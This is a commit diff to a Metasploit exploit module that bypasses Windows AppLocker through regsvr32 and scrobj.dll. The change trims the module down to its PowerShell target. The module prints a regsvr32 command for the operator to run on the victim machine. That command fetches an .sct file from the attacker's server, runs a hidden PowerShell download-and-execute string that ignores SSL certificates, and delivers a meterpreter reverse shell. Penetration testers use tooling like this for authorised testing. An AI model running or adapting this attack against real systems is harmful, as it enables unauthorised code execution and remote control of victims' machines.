Moving back to PSH option only

kn0 · kn0 · commit 52bbd22a8154 · 2016-06-13T12:10:48.000-05:00
diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -29,10 +29,7 @@ def initialize(info = {})
         {
           'Payload'    => 'windows/meterpreter/reverse_tcp'
         },
-      'Targets'        => [
-        ['PSH', {}],
-        ['CMD', {}]
-      ],
+      'Targets'        => [['PSH', {}]],
       'Platform'       => %w(win),
       'Arch' => [ARCH_X86, ARCH_X86_64],
       'DefaultTarget'  => 0,
@@ -42,17 +39,12 @@ def initialize(info = {})
           ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
         ]
     ))
-    register_options(
-      [
-        OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)',''])
-      ])
   end
 
 
   def primer
-    url = get_uri
     print_status('Run the following command on the target machine:')
-    print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+    print_line("regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll")
   end
 
 
@@ -69,21 +61,15 @@ def on_request_uri(cli, _request)
 
   def serve_sct_file
     print_status("Handling request for the .sct file from #{cli.peerhost}")
-    url = get_uri
-    case target.name
-    when 'PSH'
-      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
-      download_and_run = "#{ignore_cert}#{download_string}"
-      psh_command = generate_psh_command_line(
-        noprofile: true,
-        windowstyle: 'hidden',
-        command: download_and_run
-      )
-      data = gen_sct_file(psh_command)
-    when 'CMD'
-      data = gen_sct_file(datastore['CMD'])
-    end
+    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+    download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)
+    download_and_run = "#{ignore_cert}#{download_string}"
+    psh_command = generate_psh_command_line(
+      noprofile: true,
+      windowstyle: 'hidden',
+      command: download_and_run
+    )
+    data = gen_sct_file(psh_command)
     send_response(cli, data, 'Content-Type' => 'text/plain')
   end
 
